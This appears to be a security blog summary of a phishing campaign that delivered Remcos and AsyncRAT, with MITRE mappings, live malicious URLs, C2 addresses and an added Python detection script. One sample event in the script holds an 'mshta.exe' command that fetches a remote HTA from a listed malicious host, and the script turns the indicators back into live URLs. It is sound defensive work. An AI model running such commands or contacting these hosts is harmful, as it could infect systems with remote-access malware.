AsyncRAT and Remcos Delivered in Multi-Stage Phishing Campaign

LevelBlue SpiderLabs tracked a global phishing campaign using malicious Excel attachments to deliver multi-stage payloads that ultimately deployed Remcos and AsyncRAT. The operators used heavy obfuscation, disposable infrastructure, and themed HTA filenames to hide activity across multiple industries and countries. #Remcos #AsyncRAT #CloudflareWorkers #workersdev

Keypoints

  • LevelBlue SpiderLabs observed an active phishing campaign distributing malicious Excel spreadsheet attachments over a two-week period.
  • The campaign expanded from a limited phishing attempt into a widespread operation affecting organizations in manufacturing, media, professional services, agriculture, and chemicals.
  • Victims were globally distributed across Europe, the Asia-Pacific region, and the Americas, with emails seen in English, Polish, Chinese, and Thai.
  • The infection chain used multiple stages: malicious spreadsheet macro, HTA loader, script execution, and final payload delivery.
  • The campaign delivered Remcos and AsyncRAT, and may also have distributed FormBook and Lumma.
  • Attackers used obfuscation methods including URL shorteners, padded HTA files, Base64 encoding, PNG-embedded payloads, and Cloudflare Workers infrastructure.
  • The operators used unusual positive-sounding HTA filenames and rotating infrastructure, suggesting automation and high-volume campaign generation.

MITRE Techniques

  • [T1566.001] Spearphishing Attachment – Malicious emails delivered weaponized spreadsheet attachments to targeted staff (‘phishing emails deliver weaponized .xls files’).
  • [T1204.002] User Execution: Malicious File – The victim had to open the spreadsheet and enable macros to start the infection chain (‘opens .xls attachment and enables macros’).
  • [T1059.005] Command and Scripting Interpreter: Visual Basic – Embedded VBA in the Excel droppers fetched the HTA payload (‘Embedded VBA macros in .xls droppers fetch and launch the HTA second stage’).
  • [T1218.005] System Binary Proxy Execution: Mshta – HTA files were executed through mshta.exe to run the next stage (‘HTA files executed via mshta.exe’).
  • [T1059.007] Command and Scripting Interpreter: JavaScript – The HTA payload contained JavaScript used for staging and retrieving payloads (‘HTA payloads contain JavaScript responsible for staging and payload retrieval’).
  • [T1102] Web Service – The attack used web services for geolocation lookup and staged content retrieval (‘query geoplugin[.]net for victim geolocation’).
  • [T1071.001] Application Layer Protocol: Web Protocols – HTTP/HTTPS supported downloads, redirects, and C2 communication (‘HTTP/HTTPS used for HTA download, PNG stager retrieval, URL shortener redirects’).
  • [T1027] Obfuscated Files or Information – The attackers concealed payloads using padding, Base64, decoy strings, and PNG steganography (‘PNG files used for steganography’).
  • [T1497] Virtualization/Sandbox Evasion – The samples used environment checks and anti-analysis behavior (‘geolocation-based execution gating; long sleep intervals and anti-debug tags’).
  • [T1547.001] Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder – Remcos configurations enabled Run key persistence (‘enable HKCU and HKLM Run key persistence’).
  • [T1056.001] Input Capture: Keylogging – Remcos and AsyncRAT were observed enabling keylogging (‘observed enabling keylogging’).
  • [T1573] Encrypted Channel – Remcos C2 traffic used encrypted communications (‘RC4-encrypted communications with TLS certificate material’).

Indicators of Compromise

  • [SHA256] Analyzed malicious spreadsheet attachment delivering AsyncRAT – 49c7b4eb6620917ee7ca796472b7af9f01ea6f7f80391ae7eb7bd8dabe0b7249
  • [URL] URL shorteners used to redirect to HTA payloads – https://cuth[.]me/sse8kU, https://masuk[.]to/FdpxBG
  • [URL] Obfuscated payload retrieval and hosted stages – https://as[.]al/file/KBn1RC, http://107.172.235[.]213/87/img_015059.png
  • [URL] Remcos and AsyncRAT payload hosting – http://107.172.135[.]60/96/ibredgoodforbestthingscomingbackform.hta, http://198.12.83[.]75/98/img_194618.png
  • [IP] Remcos C2 infrastructure – 173.231.188[.]244:14641, 192.227.219[.]79:4550
  • [Domain] Remcos command-and-control domain – ffgfgjjddsgtrddhtjyfdsessxdssdfdfdfghfhg.duckdns[.]org:14647
  • [Hostname] Cloudflare Workers hosts used for multiple payloads – icy-lab-0431.guilherme-telecomunicacoes2024.workers[.]dev, dawn-bush-ddd1.yasminanthonyy.workers[.]dev
  • [Hostname] Additional Cloudflare Workers host observed in the campaign – small-morning-8be0.fsocietyandtools.workers[.]dev
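The MITRE list and the indicator list above are what a detection engineer would operationalize first. The following is an added example, not code from the LevelBlue SpiderLabs post: it refangs the defanged indicators exactly as listed on this page into a lookup set, then runs a small detection pass over constructed log events that model the described chain (Office spawning mshta.exe, an mshta.exe command line carrying a shortener URL, proxy requests to listed hosts, and a connection to a listed Remcos C2 endpoint). The event shapes, field names, sample clients and the unlisted `workers.dev` hostname are assumptions for illustration.

```python
"""Added example (not from the original post): refang the page's IoCs and
check constructed process, proxy and network events against them.
Event layout and field names are assumptions, not a real SIEM schema."""
import re
from urllib.parse import urlparse

# Indicators copied from the page, still defanged.
DEFANGED_IOCS = [
    "https://cuth[.]me/sse8kU",
    "https://masuk[.]to/FdpxBG",
    "https://as[.]al/file/KBn1RC",
    "http://107.172.235[.]213/87/img_015059.png",
    "http://107.172.135[.]60/96/ibredgoodforbestthingscomingbackform.hta",
    "hxxp://198.12.83[.]75/98/img_194618.png",
    "173.231.188[.]244:14641",
    "192.227.219[.]79:4550",
    "ffgfgjjddsgtrddhtjyfdsessxdssdfdfdfghfhg.duckdns[.]org:14647",
    "icy-lab-0431.guilherme-telecomunicacoes2024.workers[.]dev",
    "dawn-bush-ddd1.yasminanthonyy.workers[.]dev",
    "small-morning-8be0.fsocietyandtools.workers[.]dev",
]

def refang(ioc: str) -> str:
    """Undo the defanging conventions used in the list ("hxxp", "[.]", "[:]")."""
    s = re.sub(r"^hxxp", "http", ioc.strip(), flags=re.IGNORECASE)
    return s.replace("[.]", ".").replace("[:]", ":")

def host_of(value: str) -> str:
    """Bare host (no scheme, path or port) of a URL, host:port pair or hostname."""
    s = refang(value)
    if "://" in s:
        return urlparse(s).hostname or ""
    return s.split(":")[0]

IOC_HOSTS = {host_of(i) for i in DEFANGED_IOCS}
# host:port pairs on the page are the Remcos C2 endpoints.
C2_ENDPOINTS = {refang(i) for i in DEFANGED_IOCS if "://" not in i and ":" in i}
OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe"}

def analyze(events):
    """Return (severity, technique, message) tuples for events matching the chain."""
    alerts = []
    for ev in events:
        if ev["type"] == "process" and ev["image"].lower() == "mshta.exe":
            # T1204.002 -> T1218.005: an Office process launching mshta.exe.
            if ev["parent"].lower() in OFFICE_PARENTS:
                alerts.append(("high", "T1218.005",
                               f"{ev['parent']} spawned mshta.exe: {ev['cmdline']}"))
            # mshta.exe pulling a remote HTA from a listed host (shortener / stager).
            m = re.search(r"https?://\S+", ev["cmdline"], re.IGNORECASE)
            if m and host_of(m.group(0)) in IOC_HOSTS:
                alerts.append(("high", "T1102",
                               f"mshta.exe fetched from listed host: {m.group(0)}"))
        elif ev["type"] == "proxy":
            host = host_of(ev["url"])
            if host in IOC_HOSTS:
                alerts.append(("high", "T1071.001",
                               f"{ev['client']} requested listed URL {ev['url']}"))
            elif host.endswith(".workers.dev"):
                # Not on the list: a hunting lead only, workers.dev is a shared service.
                alerts.append(("low", "T1102",
                               f"{ev['client']} reached unlisted workers.dev host {host}"))
        elif ev["type"] == "netconn":
            endpoint = f"{ev['dst']}:{ev['dport']}"
            if endpoint in C2_ENDPOINTS:
                alerts.append(("high", "T1573",
                               f"{ev['image']} connected to listed Remcos C2 {endpoint}"))
    return alerts

# Constructed sample events (assumed Sysmon-style fields, not real telemetry).
SAMPLE_EVENTS = [
    {"type": "process", "parent": "EXCEL.EXE", "image": "mshta.exe",
     "cmdline": "mshta.exe https://cuth.me/sse8kU"},
    {"type": "process", "parent": "explorer.exe", "image": "mshta.exe",
     "cmdline": "mshta.exe C:\\Users\\bob\\installer.hta"},
    {"type": "proxy", "url": "http://198.12.83.75/98/img_194618.png", "client": "10.0.0.7"},
    {"type": "proxy", "url": "https://dawn-bush-ddd1.yasminanthonyy.workers.dev/x", "client": "10.0.0.9"},
    {"type": "proxy", "url": "https://quiet-river-1234.example-account.workers.dev/x", "client": "10.0.0.9"},
    {"type": "proxy", "url": "https://example.com/index.html", "client": "10.0.0.7"},
    {"type": "netconn", "dst": "173.231.188.244", "dport": 14641, "image": "svchost.exe"},
]

if __name__ == "__main__":
    for sev, tech, msg in analyze(SAMPLE_EVENTS):
        print(f"[{sev}] {tech}: {msg}")
```

The Office-to-mshta.exe rule is the durable part: the listed URLs, IPs and Workers hostnames are disposable by design (the post notes rotating infrastructure), so a host match is confirmation rather than the primary detection.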


Read more: https://www.levelblue.com/blogs/spiderlabs-blog/asyncrat-and-remcos-delivered-in-multi-stage-phishing-campaign